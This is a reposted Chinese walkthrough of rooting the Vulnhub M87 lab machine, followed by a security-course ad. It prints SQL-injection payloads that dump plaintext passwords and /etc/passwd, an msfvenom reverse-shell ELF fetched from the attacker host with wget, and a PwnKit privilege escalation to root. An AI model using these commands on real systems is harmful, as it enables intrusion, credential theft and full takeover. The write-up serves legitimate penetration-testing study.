网安教育
培养网络安全人才
技术交流、学习咨询
1─(kali㉿kali)-[~/Desktop/Vulnhub/m87]
2└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
3Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
4
5 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
6 _____________________________________________________________________________
7 IP At MAC Address Count Len MAC Vendor / Hostname
8 -----------------------------------------------------------------------------
9 192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
10 192.168.56.100 08:00:27:64:18:1b 1 60 PCS Systemtechnik GmbH
11 192.168.56.250 08:00:27:10:66:7a 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.250
1┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
2└─$ sudo nmap -sS -sV -sC -p- 192.168.56.250 -oN nmap_full_scan
3Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-09 22:07 EDT
4Nmap scan report for bogon (192.168.56.250)
5Host is up (0.00021s latency).
6Not shown: 65532 closed tcp ports (reset)
7PORT STATE SERVICE VERSION
822/tcp filtered ssh
980/tcp open http Apache httpd 2.4.38 ((Debian))
10|_http-title: M87 Login Form
11|_http-server-header: Apache/2.4.38 (Debian)
129090/tcp open ssl/zeus-admin?
13| fingerprint-strings:
14| GetRequest, HTTPOptions:
15| HTTP/1.1 400 Bad request
16| Content-Type: text/html; charset=utf8
17| Transfer-Encoding: chunked
18| X-DNS-Prefetch-Control: off
19| Referrer-Policy: no-referrer
20| X-Content-Type-Options: nosniff
21| Cross-Origin-Resource-Policy: same-origin
22| <!DOCTYPE html>
23| <html>
24| <head>
25| <title>
26| request
27| </title>
28| <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
29| <meta name="viewport" content="width=device-width, initial-scale=1.0">
30| <style>
31| body {
32| margin: 0;
33| font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
34| font-size: 12px;
35| line-height: 1.66666667;
36| color: #333333;
37| background-color: #f5f5f5;
38| border: 0;
39| vertical-align: middle;
40| font-weight: 300;
41|_ margin: 0 0 10p
42
NMAP扫描结果表明目标主机有3个开放端口:22(ssh)、80(http)、9090(ssl)
浏览器访问80端口,为用户登录界面,需要输入email和密码。
1──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
2└─$ nikto -h http://192.168.56.250
3- Nikto v2.1.6
4---------------------------------------------------------------------------
5+ Target IP: 192.168.56.250
6+ Target Hostname: 192.168.56.250
7+ Target Port: 80
8+ Start Time: 2023-04-09 22:14:57 (GMT-4)
9---------------------------------------------------------------------------
10+ Server: Apache/2.4.38 (Debian)
11+ The anti-clickjacking X-Frame-Options header is not present.
12+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
13+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
14+ No CGI Directories found (use '-C all' to force check all possible dirs)
15+ Server may leak inodes via ETags, header found with file /, inode: 52a, size: 5b295a9e85480, mtime: gzip
16+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
17+ OSVDB-3092: /admin/: This might be interesting...
18+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
19+ OSVDB-3233: /icons/README: Apache default file found.
20+ 7915 requests: 0 error(s) and 8 item(s) reported on remote host
21+ End Time: 2023-04-09 22:15:58 (GMT-4) (61 seconds)
22---------------------------------------------------------------------------
23+ 1 host(s) tested
24
25
26 *********************************************************************
27 Portions of the server's headers (Apache/2.4.38) are not in
28 the Nikto 2.1.6 database or are newer than the known string. Would you like
29 to submit this information (*no server specific data*) to CIRT.net
30 for a Nikto update (or you may email to [email protected]) (y/n)?
31
nikto工具发现了/admin目录,访问该目录,为用户登录界面,
1┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
2└─$ gobuster dir -u http://192.168.56.250 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.sh,.txt
3===============================================================
4Gobuster v3.5
5by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
6===============================================================
7[+] Url: http://192.168.56.250
8[+] Method: GET
9[+] Threads: 10
10[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
11[+] Negative Status codes: 404
12[+] User Agent: gobuster/3.5
13[+] Extensions: php,js,html,sh,txt
14[+] Timeout: 10s
15===============================================================
162023/04/09 22:19:24 Starting gobuster in directory enumeration mode
17===============================================================
18/.php (Status: 403) [Size: 279]
19/.html (Status: 403) [Size: 279]
20/index.html (Status: 200) [Size: 1322]
21/admin (Status: 301) [Size: 316] [--> http://192.168.56.250/admin/]
22/assets (Status: 301) [Size: 317] [--> http://192.168.56.250/assets/]
23/LICENSE (Status: 200) [Size: 1073]
24/.php (Status: 403) [Size: 279]
25/.html (Status: 403) [Size: 279]
26/server-status (Status: 403) [Size: 279]
27Progress: 1321374 / 1323366 (99.85%)
28===============================================================
292023/04/09 22:24:03 Finished
30===============================================================
1┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
2└─$ nikto -h https://192.168.56.250:9090
3- Nikto v2.1.6
4---------------------------------------------------------------------------
5+ Target IP: 192.168.56.250
6+ Target Hostname: 192.168.56.250
7+ Target Port: 9090
8---------------------------------------------------------------------------
9+ SSL Info: Subject: /O=662b442c19a840e482f9f69cde8f316e/CN=M87
10 Ciphers: TLS_AES_256_GCM_SHA384
11 Issuer: /O=662b442c19a840e482f9f69cde8f316e/CN=M87
12+ Start Time: 2023-04-09 22:20:30 (GMT-4)
13---------------------------------------------------------------------------
14+ Server: No banner retrieved
15+ The anti-clickjacking X-Frame-Options header is not present.
16+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
17+ Uncommon header 'x-dns-prefetch-control' found, with contents: off
18+ Uncommon header 'cross-origin-resource-policy' found, with contents: same-origin
19+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
20+ The site uses SSL and Expect-CT header is not present.
21+ No CGI Directories found (use '-C all' to force check all possible dirs)
22+ Hostname '192.168.56.250' does not match certificate's names: M87
23+ Retrieved access-control-allow-origin header: https://192.168.56.250:9090
24+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
25+ Scan terminated: 18 error(s) and 8 item(s) reported on remote host
26+ End Time: 2023-04-09 22:28:40 (GMT-4) (490 seconds)
27---------------------------------------------------------------------------
28+ 1 host(s) tested
29
80端口发现了/admin目录,访问该目录,为用户登录界面,经过测试并没有发现有SQL注入漏洞。此时对/admin进一步扫描:
1┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
2└─$ dirb http://192.168.56.250
3
4-----------------
5DIRB v2.22
6By The Dark Raver
7-----------------
8
9START_TIME: Sun Apr 9 22:53:30 2023
10URL_BASE: http://192.168.56.250/
11WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
12
13-----------------
14
15GENERATED WORDS: 4612
16
17---- Scanning URL: http://192.168.56.250/ ----
18==> DIRECTORY: http://192.168.56.250/admin/
19==> DIRECTORY: http://192.168.56.250/assets/
20+ http://192.168.56.250/index.html (CODE:200|SIZE:1322)
21+ http://192.168.56.250/LICENSE (CODE:200|SIZE:1073)
22+ http://192.168.56.250/server-status (CODE:403|SIZE:279)
23
24---- Entering directory: http://192.168.56.250/admin/ ----
25==> DIRECTORY: http://192.168.56.250/admin/backup/
26==> DIRECTORY: http://192.168.56.250/admin/css/
27==> DIRECTORY: http://192.168.56.250/admin/images/
28+ http://192.168.56.250/admin/index.php (CODE:200|SIZE:4393)
29==> DIRECTORY: http://192.168.56.250/admin/js/
30
31---- Entering directory: http://192.168.56.250/assets/ ----
32(!) WARNING: Directory IS LISTABLE. No need to scan it.
33 (Use mode '-w' if you want to scan it anyway)
34
35---- Entering directory: http://192.168.56.250/admin/backup/ ----
36+ http://192.168.56.250/admin/backup/index.php (CODE:200|SIZE:4412)
37
38---- Entering directory: http://192.168.56.250/admin/css/ ----
39(!) WARNING: Directory IS LISTABLE. No need to scan it.
40 (Use mode '-w' if you want to scan it anyway)
41
42---- Entering directory: http://192.168.56.250/admin/images/ ----
43(!) WARNING: Directory IS LISTABLE. No need to scan it.
44 (Use mode '-w' if you want to scan it anyway)
45
46---- Entering directory: http://192.168.56.250/admin/js/ ----
47(!) WARNING: Directory IS LISTABLE. No need to scan it.
48 (Use mode '-w' if you want to scan it anyway)
49
50-----------------
51END_TIME: Sun Apr 9 22:53:49 2023
52DOWNLOADED: 13836 - FOUND: 5
在/admin目录下发现了/backup,该目录仍然是用户登录界面,并且尝试有无登录绕过,结果失败,对backup进行FUZZING
1┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
2└─$ wfuzz -c -u http://192.168.56.250/admin/backup/?FUZZ=id -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 161
3 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
4********************************************************
5* Wfuzz 3.1.0 - The Web Fuzzer *
6********************************************************
7
8Target: http://192.168.56.250/admin/backup/?FUZZ=id
9Total requests: 220560
10
11=====================================================================
12ID Response Lines Word Chars Payload
13=====================================================================
14
15000000529: 200 87 L 162 W 4459 Ch "id"
16000000759: 200 3 L 2 W 19 Ch "file"
发现了两个参数id和file,先看一下id
1┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
2└─$ curl http://192.168.56.250/admin/backup/?id=id
3<html>
4
5</html>
6jackceobradexpensesjuliamikeadrianjohnadminalex
说明参数id存在。
经过测试file参数并不能有相应的返回。
经过简单测试id参数存在SQL注入漏洞
1──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
2└─$ sqlmap -u 'http://192.168.56.250/admin/backup/?id=1'
3[23:00:42] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
4GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
5sqlmap identified the following injection point(s) with a total of 1185 HTTP(s) requests:
6---
7Parameter: id (GET)
8 Type: error-based
9 Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
10 Payload: id=1 AND (SELECT 5676 FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT (ELT(5676=5676,1))),0x7176787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
11
12 Type: time-based blind
13 Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
14 Payload: id=1 AND (SELECT 5427 FROM (SELECT(SLEEP(5)))XWSn)
15
16 Type: UNION query
17 Title: Generic UNION query (NULL) - 1 column
18 Payload: id=1 UNION ALL SELECT CONCAT(0x716a6b6a71,0x75784a6770575651456c4d7279414c434a497241437a534b486d475a456b62625974585579426b6f,0x7176787171)-- -
19---
20[23:00:57] [INFO] the back-end DBMS is MySQL
21web server operating system: Linux Debian 10 (buster)
22web application technology: Apache 2.4.38
23back-end DBMS: MySQL >= 5.0 (MariaDB fork)
24[23:00:57] [INFO] fetched data logged to text files under'/home/kali/.local/share/sqlmap/output/192.168.56.250'
25[23:00:57] [WARNING] your sqlmap version is outdated
26
27[*] ending @ 23:00:57 /2023-04-09/
1─$ sqlmap -u 'http://192.168.56.250/admin/backup/?id=1' --dbs
2available databases [4]:
3[*] db
4[*] information_schema
5[*] mysql
6[*] performance_schema
1$ sqlmap -u 'http://192.168.56.250/admin/backup/?id=1' -D db --tables
2Database: db
3[1 table]
4+-------+
5| users |
6+-------+
1─$ sqlmap -u 'http://192.168.56.250/admin/backup/?id=1' -D db -T users --columns
2Table: users
3[4 columns]
4+----------+-------------+
5| Column | Type |
6+----------+-------------+
7| email | varchar(50) |
8| id | int(11) |
9| password | varchar(50) |
10| username | varchar(50) |
11+----------+-------------+
12
1$ sqlmap -u 'http://192.168.56.250/admin/backup/?id=1' -D db -T users -C email,username,password --dump
2+--------------------+----------+-----------------+
3| email | username | password |
4+--------------------+----------+-----------------+
5| jack@localhost | jack | gae5g5a |
6| ceo@localhost | ceo | 5t96y4i95y |
7| brad@localhost | brad | gae5g5a |
8| expenses@localhost | expenses | 5t96y4i95y |
9| julia@localhost | julia | fw54vrfwe45 |
10| mike@localhost | mike | 4kworw4 |
11| adrian@localhost | adrian | fw54vrfwe45 |
12| john@localhost | john | 4kworw4 |
13| admin@localhost | admin | 15The4Dm1n4L1f3 |
14| alex@localhost | alex | dsfsrw4 |
15+--------------------+----------+-----------------+
但是这些email, username, 以及password都无法登录80默认页面,admin页面,admin/backup页面。
尝试通过sqlmap得到shell失败
1──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
2└─$ sqlmap -u 'http://192.168.56.250/admin/backup/?id=1' --os-shell
1─(kali㉿kali)-[~/Desktop/Vulnhub/m87]
2└─$ sqlmap -u 'http://192.168.56.250/admin/backup/?id=1' --file-read /etc/passwd
1┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
2└─$ cat /home/kali/.local/share/sqlmap/output/192.168.56.250/files/_etc_passwd
3root:x:0:0:root:/root:/bin/bash
4daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
5bin:x:2:2:bin:/bin:/usr/sbin/nologin
6sys:x:3:3:sys:/dev:/usr/sbin/nologin
7sync:x:4:65534:sync:/bin:/bin/sync
8games:x:5:60:games:/usr/games:/usr/sbin/nologin
9man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
10lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
11mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
12news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
13uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
14proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
15www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
16backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
17list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
18irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
19gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
20nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
21_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
22systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
23systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
24systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
25messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
26avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
27sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
28charlotte:x:1000:1000:charlotte,,,:/home/charlotte:/bin/bash
29systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
30mysql:x:107:115:MySQL Server,,,:/nonexistent:/bin/false
31dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
32Debian-exim:x:109:116::/var/spool/exim4:/usr/sbin/nologin
33cockpit-ws:x:110:117::/nonexisting:/usr/sbin/nologin
34cockpit-wsinstance:x:111:118::/nonexisting:/usr/sbin/nologin
通过SQLMAP得到用户charlotte,尝试用该用户登录9090端口(遍历之前得到的密码)
经过尝试,密码为15The4Dm1n4L1f3
成功登陆9090管理后台,管理后台有terminal功能
charlotte@M87:~$ ls -alh
1charlotte@M87:~$ ls -alh
2total 32K
3drwxr-xr-x 3 charlotte charlotte 4.0K Nov 6 2020 .
4drwxr-xr-x 3 root root 4.0K Nov 6 2020 ..
5lrwxrwxrwx 1 root root 9 Nov 6 2020 .bash_history -> /dev/null
6-rw-r--r-- 1 charlotte charlotte 220 Nov 6 2020 .bash_logout
7-rw-r--r-- 1 charlotte charlotte 3.5K Nov 6 2020 .bashrc
8drwx------ 3 charlotte charlotte 4.0K Apr 9 23:15 .gnupg
9-rw------- 1 charlotte charlotte 33 Nov 6 2020 local.txt
10-rw-r--r-- 1 charlotte charlotte 807 Nov 6 2020 .profile
11-rw------- 1 charlotte charlotte 49 Nov 6 2020 .Xauthority
12charlotte@M87:~$ cat local.txt
1329247ebdec52ba0b9a6fd10d68f6b91f
接下里先将shell升级到meterpreter
1┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
2└─$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.230 LPORT=5555 -f elf -o escalate.elf
将escalate.elf上传到目标主机/tmp目录下
1charlotte@M87:/tmp$ wget http://192.168.56.230:8000/escalate.elf
2--2023-04-09 23:19:55-- http://192.168.56.230:8000/escalate.elf
3Connecting to 192.168.56.230:8000... connected.
4HTTP request sent, awaiting response... 200 OK
5Length: 207 [application/octet-stream]
6Saving to: ‘escalate.elf’
7
8escalate.elf 100% [=================================================================================================>] 207 --.-KB/s in 0s
9
102023-04-09 23:19:55 (42.5 MB/s) - ‘escalate.elf’ saved [207/207]
11
12charlotte@M87:/tmp$ chmod +x escalate.elf
1msf6 > use exploit/multi/handler
2[*] Using configured payload generic/shell_reverse_tcp
3msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
4payload => linux/x86/meterpreter/reverse_tcp
5msf6 exploit(multi/handler) > show options
6
7Module options (exploit/multi/handler):
8
9 Name Current Setting Required Description
10 ---- --------------- -------- -----------
11
12
13Payload options (linux/x86/meterpreter/reverse_tcp):
14
15 Name Current Setting Required Description
16 ---- --------------- -------- -----------
17 LHOST yes The listen address (an interface may be specified)
18 LPORT 4444 yes The listen port
19
20
21Exploit target:
22
23 Id Name
24 -- ----
25 0 Wildcard Target
26
27
28msf6 exploit(multi/handler) > set LHOST 192.168.56.230
29LHOST => 192.168.56.230
30msf6 exploit(multi/handler) > set LPORT 5555
31LPORT => 5555
32msf6 exploit(multi/handler) > run
33
34[*] Started reverse TCP handler on 192.168.56.230:5555
35
在目标主机运行escalate.elf
1[*] Started reverse TCP handler on 192.168.56.230:5555
2[*] Sending stage (989032 bytes) to 192.168.56.250
3[*] Meterpreter session 1 opened (192.168.56.230:5555 -> 192.168.56.250:34932) at 2023-04-09 23:22:06 -0400
4
5meterpreter >
得到了meterpreter会话
然后利用suggest模块定位可以提权的漏洞。
1msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
2msf6 post(multi/recon/local_exploit_suggester) > show options
3
4Module options (post/multi/recon/local_exploit_suggester):
5
6 Name Current Setting Required Description
7 ---- --------------- -------- -----------
8 SESSION yes The session to run this module on
9 SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
10
11msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
12SESSION => 1
13msf6 post(multi/recon/local_exploit_suggester) > run
14
15[*] 192.168.56.250 - Collecting local exploits for x86/linux...
16[*] 192.168.56.250 - 167 exploit checks are being tried...
17[+] 192.168.56.250 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
18[+] 192.168.56.250 - exploit/linux/local/network_manager_vpnc_username_priv_esc: The service is running, but could not be validated.
19[+] 192.168.56.250 - exploit/linux/local/pkexec: The service is running, but could not be validated.
20[+] 192.168.56.250 - exploit/linux/local/su_login: The target appears to be vulnerable.
21[*] Running check method for exploit 48 / 48
22[*] 192.168.56.250 - Valid modules for session 1:
23============================
24
25 # Name Potentially Vulnerable? Check Result
26 - ---- ----------------------- ------------
27 1 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable.
28 2 exploit/linux/local/network_manager_vpnc_username_priv_esc Yes The service is running, but could not be validated.
29 3 exploit/linux/local/pkexec Yes The service is running, but could not be validated.
30 4 exploit/linux/local/su_login Yes The target appears to be vulnerable.
选择第1个漏洞进行本地提权
1msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
2[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
3msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options
4
5Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):
6
7 Name Current Setting Required Description
8 ---- --------------- -------- -----------
9 PKEXEC_PATH no The path to pkexec binary
10 SESSION yes The session to run this module on
11 WRITABLE_DIR /tmp yes A directory where we can write files
12
13
14Payload options (linux/x64/meterpreter/reverse_tcp):
15
16 Name Current Setting Required Description
17 ---- --------------- -------- -----------
18 LHOST 10.0.2.15 yes The listen address (an interface may be specified)
19 LPORT 4444 yes The listen port
20
21
22Exploit target:
23
24 Id Name
25 -- ----
26 0 x86_64
27
28
29msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 192.168.56.230
30LHOST => 192.168.56.230
31msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 6666
32LPORT => 6666
33msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 1
34SESSION => 1
35msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run
36
37[*] Started reverse TCP handler on 192.168.56.230:6666
38[*] Running automatic check ("set AutoCheck false" to disable)
39[!] Verify cleanup of /tmp/.kngdnssvny
40[+] The target is vulnerable.
41[*] Writing '/tmp/.mefpssoat/avrwdjlbd/avrwdjlbd.so' (548 bytes) ...
42[!] Verify cleanup of /tmp/.mefpssoat
43[*] Sending stage (3020772 bytes) to 192.168.56.250
44[+] Deleted /tmp/.mefpssoat/avrwdjlbd/avrwdjlbd.so
45[+] Deleted /tmp/.mefpssoat/.qqfoljnxo
46[+] Deleted /tmp/.mefpssoat
47[*] Meterpreter session 2 opened (192.168.56.230:6666 -> 192.168.56.250:40732) at 2023-04-09 23:26:24 -0400
48
49id
50
51meterpreter >
52meterpreter > id
53[-] Unknown command: id
54meterpreter > shell
55Process 11811 created.
56Channel 1 created.
57id
58uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),1000(charlotte)
59cd /root
60ls -alh
61total 28K
62drwx------ 4 root root 4.0K Nov 6 2020 .
63drwxr-xr-x 18 root root 4.0K Nov 6 2020 ..
64lrwxrwxrwx 1 root root 9 Nov 6 2020 .bash_history -> /dev/null
65-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
66drwx------ 3 root root 4.0K Nov 6 2020 .gnupg
67drwxr-xr-x 3 root root 4.0K Nov 6 2020 .local
68-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
69-rw------- 1 root root 1.2K Nov 6 2020 proof.txt
70cat proof.txt
71
72
73MMMMMMMM MMMMMMMM 888888888 77777777777777777777
74M:::::::M M:::::::M 88:::::::::88 7::::::::::::::::::7
75M::::::::M M::::::::M 88:::::::::::::88 7::::::::::::::::::7
76M:::::::::M M:::::::::M8::::::88888::::::8777777777777:::::::7
77M::::::::::M M::::::::::M8:::::8 8:::::8 7::::::7
78M:::::::::::M M:::::::::::M8:::::8 8:::::8 7::::::7
79M:::::::M::::M M::::M:::::::M 8:::::88888:::::8 7::::::7
80M::::::M M::::M M::::M M::::::M 8:::::::::::::8 7::::::7
81M::::::M M::::M::::M M::::::M 8:::::88888:::::8 7::::::7
82M::::::M M:::::::M M::::::M8:::::8 8:::::8 7::::::7
83M::::::M M:::::M M::::::M8:::::8 8:::::8 7::::::7
84M::::::M MMMMM M::::::M8:::::8 8:::::8 7::::::7
85M::::::M M::::::M8::::::88888::::::8 7::::::7
86M::::::M M::::::M 88:::::::::::::88 7::::::7
87M::::::M M::::::M 88:::::::::88 7::::::7
88MMMMMMMM MMMMMMMM 888888888 77777777
89
90
91Congratulations!
92
93You've rooted m87!
94
9521e5e63855f249bcd1b4b093af669b1e
96
97mindsflee
98
至此成功得到了root shell和root flag
目录扫描不能只使用一种工具,否则会漏掉重要的二级目录
本靶机的关键是识别出/admin/backup/目录后,需要FUZZ出参数?有点烧脑哈
文:Jason_huawen
原文链接:https://www.cnblogs.com/jason-huawen/p/17302391.html
版权声明:著作权归作者所有。如有侵权请联系删除
网络安全基础班、实战班线上全面开启,学网络安全技术、升职加薪……有兴趣的可以加入网安大家庭,一起学习、一起成长,考证书求职加分、升级加薪,有兴趣的可以咨询客服小姐姐哦!
加QQ(1005989737)找小姐姐私聊哦
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论